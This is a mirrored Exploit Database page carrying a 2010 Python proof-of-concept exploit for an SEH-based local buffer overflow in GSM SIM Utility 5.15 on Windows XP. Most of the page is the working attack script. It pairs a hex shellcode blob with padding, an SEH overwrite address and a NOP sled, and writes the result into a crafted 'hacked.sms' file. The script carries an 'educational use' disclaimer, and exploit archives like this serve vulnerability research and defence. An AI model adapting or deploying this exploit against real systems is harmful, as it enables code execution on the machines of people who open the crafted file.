GSM SIM Utility 5.15 – ‘.sms’ File Local Buffer Overflow (SEH)

• Exploit Database
• 492 阅读

• 作者： chap0
  日期： 2010-06-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14098/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75

  # Exploit Title : GSM SIM Utility sms file Local SEH BoF # Date: June 28, 2010 # Author: chap0 [www.seek-truth.net] # Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol # Version : 5.15 # OS: Windows XP SP3 # Type of vuln: SEH # Greetz to : Corelan Security Team * Special Greetz to Lincoln # Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054 # The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # Code: import time print "|------------------------------------------------------------------|" print "| __ __|" print "| _________________/ /___ _____ / /________ _____ ___|" print "|/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ |" print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|" print "||" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] GSM SIM Utility SEH Local Exploit\n"     sc =("d9eb9bd97424f431d2b27a31c964" "8b71308b760c8b761c8b46088b7e" "208b36384f1875f35901d1ffe160" "8b6c24248b453c8b54057801ea8b" "4a188b5a2001ebe337498b348b01" "ee31ff31c0fcac84c0740ac1cf0d" "01c7e9f1ffffff3b7c242875de8b" "5a2401eb668b0c4b8b5a1c01eb8b" "048b01e88944241c61c3b20829d4" "89e589c2688e4e0eec52e89cffff" "ff894504bb7ed8e273871c2452e8" "8bffffff894508686c6c20ff6833" "322e646875736572885c240a89e6" "56ff550489c250bba8a24dbc871c" "2452e85effffff68703058206820" "6368616864204279686f69746568" "4578706c31db885c241289e3686b" "58202068426c6163687468652068" "75676820685468726f31c9884c24" "1189e131d252535152ffd031c050" "ff5508")   buf= "A" * 1834 buf+= "eb069090" buf+= "F25E4300" buf+= "90" * 20 buf+= sc try: crash = open("hacked.sms",&apos;w&apos;) crash.write(buf) crash.close() print "[+] Visit www.corelan.be port 8800!\n" except: print "Error occured, look at the code!\n" time.sleep(2)   print"[+] Exploit file created!\n"